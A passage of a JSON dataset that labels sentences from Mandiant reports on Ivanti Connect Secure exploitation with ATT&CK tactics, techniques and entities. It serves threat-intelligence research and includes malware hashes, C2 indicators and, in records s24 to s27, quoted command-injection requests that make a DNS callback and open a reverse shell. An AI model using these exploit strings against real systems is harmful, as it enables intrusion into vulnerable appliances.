"Infrastructure_Indicator" }, { "text": "CRACKMAPEXEC", "start": 78, "end": 90, "label": "MalwareTool" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s180-cf8463", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 180, "context_before": "A reverse shell is created using /bin/sh and the provided command is executed CRACKMAPEXEC | CRACKMAPEXEC is a post-exploitation tool against Microsoft Windows environments.", "sentence_text": "It is recognized for its lateral movement capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s181-7dc490", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 181, "context_before": "It is recognized for its lateral movement capabilities.", "sentence_text": "events | /runtime/logs/log.events.vc0 admin", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s182-977102", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 182, "context_before": "events | /runtime/logs/log.events.vc0 admin", "sentence_text": "| /runtime/logs/log.admin.vc0 access | /runtime", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s183-d7fb30", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 183, "context_before": "| /runtime/logs/log.admin.vc0 access | /runtime", "sentence_text": "/logs/log.access.vc0 diagnosticlog | /runtime/logs/log.diagnosticlog.vc0 policytrace | /runtime/logs/log.policytrace.vc0 sensorslog | /runtime/logs/log.sensorslog.vc0 health.py | 3045f5b3d355a9ab26ab6f44cc831a83 | CHAINLINE web shell compcheckresult.cgi | 3d97f55a03ceb4f71671aa2ecf5b24e9", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s184-6036cb", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 184, "context_before": "/logs/log.access.vc0 diagnosticlog | /runtime/logs/log.diagnosticlog.vc0 policytrace | /runtime/logs/log.policytrace.vc0 sensorslog | /runtime/logs/log.sensorslog.vc0 health.py | 3045f5b3d355a9ab26ab6f44cc831a83 | CHAINLINE web shell compcheckresult.cgi | 3d97f55a03ceb4f71671aa2ecf5b24e9", "sentence_text": "| LIGHTWIRE web shell lastauthserverused.js | 2ec505088b942c234f39a37188e80d7a | WARPWIRE credential harvester variant lastauthserverused.js | 8eb042da6ba683ef1bae460af103cc44 | WARPWIRE credential harvester variant lastauthserverused.js | a739bd4c2b9f3679f43579711448786f | WARPWIRE credential harvester variant lastauthserverused.js | a81813f70151a022ea1065b7f4d6b5ab | WARPWIRE credential harvester variant lastauthserverused.js | d0c7a334a4d9dcd3c6335ae13bee59ea | WARPWIRE credential harvester lastauthserverused.js | e8489983d73ed30a4240a14b1f161254 | WARPWIRE credential harvester variant category.py | 465600cece80861497e8c1c86a07a23e | FRAMESTING web shell logo.gif | N/A — varies | Configuration and cache dump or CAV web server log exfiltration login.gif | N/A — varies | Configuration and cache dump visits.py | N/A — varies | WIREFIRE web shell symantke[.]com | Domain | WARPWIRE C2 server miltonhouse[.]nl | Domain | WARPWIRE variant C2 server entraide-internationale[.]fr | Domain | WARPWIRE variant C2 server api.d-n-s[.]name | Domain | WARPWIRE variant C2 server cpanel.netbar[.]org | Domain | WARPWIRE variant C2 server clickcom[.]click | Domain | WARPWIRE variant C2 server clicko[.]click", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s185-cbcbdd", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 185, "context_before": "| LIGHTWIRE web shell lastauthserverused.js | 2ec505088b942c234f39a37188e80d7a | WARPWIRE credential harvester variant lastauthserverused.js | 8eb042da6ba683ef1bae460af103cc44 | WARPWIRE credential harvester variant lastauthserverused.js | a739bd4c2b9f3679f43579711448786f | WARPWIRE credential harvester variant lastauthserverused.js | a81813f70151a022ea1065b7f4d6b5ab | WARPWIRE credential harvester variant lastauthserverused.js | d0c7a334a4d9dcd3c6335ae13bee59ea | WARPWIRE credential harvester lastauthserverused.js | e8489983d73ed30a4240a14b1f161254 | WARPWIRE credential harvester variant category.py | 465600cece80861497e8c1c86a07a23e | FRAMESTING web shell logo.gif | N/A — varies | Configuration and cache dump or CAV web server log exfiltration login.gif | N/A — varies | Configuration and cache dump visits.py | N/A — varies | WIREFIRE web shell symantke[.]com | Domain | WARPWIRE C2 server miltonhouse[.]nl | Domain | WARPWIRE variant C2 server entraide-internationale[.]fr | Domain | WARPWIRE variant C2 server api.d-n-s[.]name | Domain | WARPWIRE variant C2 server cpanel.netbar[.]org | Domain | WARPWIRE variant C2 server clickcom[.]click | Domain | WARPWIRE variant C2 server clicko[.]click", "sentence_text": "| Domain | WARPWIRE variant C2 server duorhytm[.]fun | Domai​​n", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s186-d36865", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 186, "context_before": "| Domain | WARPWIRE variant C2 server duorhytm[.]fun | Domai​​n", "sentence_text": "| WARPWIRE variant C2 server line-api[.]com | Domain | WARPWIRE variant C2 server areekaweb[.]com | Domain | WARPWIRE variant C2 server ehangmun[.]com | Domain | WARPWIRE variant C2 server secure-cama[.]com | Domain | WARPWIRE variant C2 server 146.0.228[.]66", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s187-8eb4d7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 187, "context_before": "| WARPWIRE variant C2 server line-api[.]com | Domain | WARPWIRE variant C2 server areekaweb[.]com | Domain | WARPWIRE variant C2 server ehangmun[.]com | Domain | WARPWIRE variant C2 server secure-cama[.]com | Domain | WARPWIRE variant C2 server 146.0.228[.]66", "sentence_text": "| IPv4 | WARPWIRE variant C2 server 159.65.130[.]146", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s188-f17a30", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 188, "context_before": "| IPv4 | WARPWIRE variant C2 server 159.65.130[.]146", "sentence_text": "| IPv4 | WARPWIRE variant C2 server 8.137.112[.]245 | IPv4 | WARPWIRE variant C2 server 91.92.254[.]14 | IPv4 | WARPWIRE variant C2 server 186.179.39[.]235 | IPv4 | Mass exploitation activity 50.215.39[.]49 | IPv4 | Post-exploitation activity 45.61.136[.]14 | IPv4 | Post-exploitation activity 173.220.106[.]166 | IPv4 | Post-exploitation activity A106-941 | Command and Control - WARPWIRE, DNS Query, Variant #3 A106-942 | Command and Control - WARPWIRE, DNS Query, Variant #1 A106-944 | Command and Control - WARPWIRE, DNS Query, Variant #2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s1-bdfe60", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts | Google Cloud Blog Threat Intelligence Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts February 27, 2024 Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer Ivanti zero-day exploitation have continued across a variety of industry verticals, including the U.S. defense industrial base sector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s2-922a53", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts | Google Cloud Blog Threat Intelligence Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts February 27, 2024 Written by: Matt Lin, Robert Wallace, Austin Larsen, Ryan Gandrud, Jacob Thompson, Ashley Pearson, Ashley Frazer Ivanti zero-day exploitation have continued across a variety of industry verticals, including the U.S. defense industrial base sector.", "sentence_text": "Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting CVE-2024-21893 used by UNC5325 , which we introduced in our \"Cutting Edge, Part 2\" blog post Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s3-b482d2", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Following the initial publication on Jan. 10, 2024, Mandiant observed mass attempts to exploit these vulnerabilities by a small number of China-nexus threat actors, and development of a mitigation bypass exploit targeting CVE-2024-21893 used by UNC5325 , which we introduced in our \"Cutting Edge, Part 2\" blog post Notably, Mandiant has identified UNC5325 using a combination of living-off-the-land (LotL) techniques to better evade detection, while deploying novel malware such as LITTLELAMB.WOOLTEA in an attempt to persist across system upgrades, patches, and factory resets.", "sentence_text": "While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware's code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s4-b73b9b", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "While the limited attempts observed to maintain persistence have not been successful to date due to a lack of logic in the malware's code to account for an encryption key mismatch, it further demonstrates the lengths UNC5325 will go to maintain access to priority targets and highlights the importance of ensuring network appliances have the latest updates and patches.", "sentence_text": "Ivanti customers are urged to take immediate action to ensure protection if they haven't done so already.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s5-4a5241", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "Ivanti customers are urged to take immediate action to ensure protection if they haven't done so already.", "sentence_text": "A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s6-554170", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "A new version of the external Integrity Checking Tool (ICT), which helps detect these persistence attempts, is now available.", "sentence_text": "See Ivanti's security advisory and refer to our updated remediation and hardening guide , which includes the latest recommendations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s7-c05787", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "See Ivanti's security advisory and refer to our updated remediation and hardening guide , which includes the latest recommendations.", "sentence_text": "The exploitation of the Ivanti zero-days has likely impacted numerous appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s8-4c6f6f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "The exploitation of the Ivanti zero-days has likely impacted numerous appliances.", "sentence_text": "To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s9-07d6c0", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "To date, Ivanti has disclosed the following five vulnerabilities affecting Ivanti Connect Secure and other products.", "sentence_text": "In our\nprevious blog post , we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s10-0ddb29", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "In our\nprevious blog post , we described a mitigation bypass that was used to drop a newly identified BUSHWALK webshell.", "sentence_text": "The mitigation bypass is now tracked as CVE-2024-21893 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s11-6df6b8", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "The mitigation bypass is now tracked as CVE-2024-21893 .", "sentence_text": "Attribution\nUNC5325\nUNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2024-21893 to compromise Ivanti Connect Secure appliances.", "entities": [ { "text": "UNC5325", "start": 12, "end": 19, "label": "ThreatActor" }, { "text": "exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances", "start": 81, "end": 152, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s12-631cd3", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Attribution\nUNC5325\nUNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances.", "sentence_text": "UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Leverage open-source code, install custom malware, and modify system settings to evade detection and maintain persistence.", "entities": [ { "text": "UNC5325", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "leveraged code from open-source projects", "start": 8, "end": 48, "label": "Action" }, { "text": "installed custom malware", "start": 50, "end": 74, "label": "Action" }, { "text": "modified the appliance's settings in order to evade detection and attempt to maintain persistence", "start": 80, "end": 177, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s13-2a2b15", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence.", "sentence_text": "UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy multiple malware families on the compromised system.", "entities": [ { "text": "UNC5325", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK", "start": 8, "end": 92, "label": "Action" }, { "text": "LITTLELAMB.WOOLTEA", "start": 36, "end": 54, "label": "MalwareTool" }, { "text": "PITSTOP", "start": 56, "end": 63, "label": "MalwareTool" }, { "text": "PITDOG", "start": 65, "end": 71, "label": "MalwareTool" }, { "text": "PITJET", "start": 73, "end": 79, "label": "MalwareTool" }, { "text": "PITHOOK", "start": 85, "end": 92, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s14-842729", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK.", "sentence_text": "UNC3886\nUNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they leveraged novel techniques against virtualization technologies.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Compromise network devices at target environments using novel techniques against virtualization technologies.", "entities": [ { "text": "UNC3886", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "has compromised network devices at targets where they leveraged novel techniques against virtualization technologies", "start": 63, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s15-dce1f9", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "UNC3886\nUNC3886 is a suspected Chinese espionage operator that has compromised network devices at targets where they leveraged novel techniques against virtualization technologies.", "sentence_text": "They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Install custom malware by leveraging open-source code and exploiting zero-day vulnerabilities.", "entities": [ { "text": "installed custom malware built for such technologies", "start": 5, "end": 57, "label": "Action" }, { "text": "leveraging code from open-source projects", "start": 61, "end": 102, "label": "Action" }, { "text": "exploiting zero-day vulnerabilities", "start": 114, "end": 149, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s16-6ef25e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "They installed custom malware built for such technologies by leveraging code from open-source projects as well as exploiting zero-day vulnerabilities.", "sentence_text": "New TTPs and Malware Since our last blog post on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Exploit CVE-2024-21893 to deploy additional malware and maintain persistent access to compromised appliances.", "entities": [ { "text": "UNC5325", "start": 94, "end": 101, "label": "ThreatActor" }, { "text": "exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances", "start": 102, "end": 220, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s17-7bd30f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "New TTPs and Malware Since our last blog post on Ivanti exploitation, Mandiant has identified UNC5325 exploiting CVE-2024-21893 (SSRF) to deploy additional malware and maintain persistent access to compromised appliances.", "sentence_text": "The limited attempts observed to maintain persistence have not been successful to date.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s18-c609c4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "The limited attempts observed to maintain persistence have not been successful to date.", "sentence_text": "Exploitation of CVE-2024-21893 (SSRF)\nOn Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s19-695be0", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Exploitation of CVE-2024-21893 (SSRF)\nOn Jan. 31, 2024, Ivanti disclosed CVE-2024-21893, a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.", "sentence_text": "To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s20-2852f5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "To date, we have only identified successful exploitation against Ivanti Connect Secure appliances.", "sentence_text": "In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s21-36cd90", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "In the same Jan. 31, 2024, announcement, Ivanti released a new XML mitigation to prevent exploitation of all four (4) disclosed CVEs at the time of the announcement.", "sentence_text": "This included:\nCVE-2023-46805 (authentication bypass)\nCVE-2024-21887 (command injection)\nCVE-2024-21888 (privilege escalation)\nCVE-2024-21893 (server-side request forgery)\nCVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s22-b16932", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "This included:\nCVE-2023-46805 (authentication bypass)\nCVE-2024-21887 (command injection)\nCVE-2024-21888 (privilege escalation)\nCVE-2024-21893 (server-side request forgery)\nCVE-2024-21893 allowed for an unauthenticated attacker to exploit an appliance by chaining the previously disclosed command injection vulnerability as described in CVE-2024-21887.", "sentence_text": "This includes appliances with the XML mitigation released on Jan. 10, 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s23-9cc521", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "This includes appliances with the XML mitigation released on Jan. 10, 2024.", "sentence_text": "Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)\nShortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Chain SSRF and command injection vulnerabilities to exploit vulnerable devices.", "entities": [ { "text": "threat actors", "start": 136, "end": 149, "label": "ThreatActor" }, { "text": "chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices", "start": 150, "end": 282, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s24-782ef0", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Chaining CVE-2024-21893 (SSRF) and CVE-2024-21887 (Command Injection)\nShortly after the disclosure of CVE-2024-21893, Mandiant observed threat actors chaining the SSRF vulnerability with the command injection vulnerabilities described in CVE-2024-21887 to exploit vulnerable devices.", "sentence_text": "GET /api/v1/license/keys-status/;python -c 'import socket;socket.gethostbyname(\".oast.live\")' Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s25-1b4bd9", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "GET /api/v1/license/keys-status/;python -c 'import socket;socket.gethostbyname(\".oast.live\")' Shortly after a vulnerable target was identified, the threat actor executed follow-on commands to perform reconnaissance and, in some cases, establish a reverse shell.", "sentence_text": "GET /api/v1/license/keys-status/;python -c 'import socket,subprocess;s=socket.socket(socket.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s27-143745", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "AF_INET,socket.", "sentence_text": "SOCK_STREAM)\n;s.connect((\"\",));subprocess.call([\"/bin/sh\",\"-i\"]\nIdentifying Exploitation Attempts Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s28-5446aa", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "SOCK_STREAM)\n;s.connect((\"\",));subprocess.call([\"/bin/sh\",\"-i\"]\nIdentifying Exploitation Attempts Exploitation of the SSRF vulnerability in the SAML component generates up to two (2) log events and some host-based artifacts on an affected appliance.", "sentence_text": "If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID AUT31556 is generated when an unauthenticated attacker requests the vulnerable SAML endpoint, /dana-ws/saml.ws .", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Request vulnerable SAML endpoint to exploit the application.", "entities": [ { "text": "an unauthenticated attacker", "start": 122, "end": 149, "label": "ThreatActor" }, { "text": "requests the vulnerable SAML endpoint, /dana-ws/saml.ws", "start": 150, "end": 205, "label": "Action" }, { "text": "/dana-ws/saml.ws", "start": 189, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s29-9e51a4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "If the Ivanti Connect Secure appliance is configured to log unauthenticated requests, event ID AUT31556 is generated when an unauthenticated attacker requests the vulnerable SAML endpoint, /dana-ws/saml.ws .", "sentence_text": "The event includes the source IP address of the unauthenticated request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s30-2f9e89", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "The event includes the source IP address of the unauthenticated request.", "sentence_text": "AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s31-0188ad", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "AUT31556: Unauthenticated request url /dana-ws/saml.ws came from IP .", "sentence_text": "In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s32-c3f0b4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "In addition, the server fails to gracefully handle the maliciously crafted SAML payload to exploit CVE-2024-21893.", "sentence_text": "The appliance generates an error event log entry with event ID ERR31903 when the saml-server process crashes, which is potentially indicative of an exploitation attempt.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s33-1f9353", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "The appliance generates an error event log entry with event ID ERR31903 when the saml-server process crashes, which is potentially indicative of an exploitation attempt.", "sentence_text": "ERR31093: Program saml-server recently failed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s34-084ddb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "ERR31093: Program saml-server recently failed.", "sentence_text": "We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Delete relevant log files to remove traces of activity.", "entities": [ { "text": "the threat actor", "start": 142, "end": 158, "label": "ThreatActor" }, { "text": "deleting the relevant log files", "start": 159, "end": 190, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s35-ca6375", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "We recommend analyzing both allocated and unallocated disk space on the forensic image for the presence of the log events as we have observed the threat actor deleting the relevant log files.", "sentence_text": "Lastly, the crash of the saml-server process generates core dumps located in /data/var/cores/ .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s36-795cd1", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Lastly, the crash of the saml-server process generates core dumps located in /data/var/cores/ .", "sentence_text": "We have observed the threat actor deleting the contents of the cores directory, but we have successfully recovered relevant fragments of the core dumps through file carving.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Delete contents of the cores directory to remove forensic artifacts.", "entities": [ { "text": "the threat actor", "start": 17, "end": 33, "label": "ThreatActor" }, { "text": "deleting the contents of the cores directory", "start": 34, "end": 78, "label": "Action" }, { "text": "cores directory", "start": 63, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s37-e23dbb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "We have observed the threat actor deleting the contents of the cores directory, but we have successfully recovered relevant fragments of the core dumps 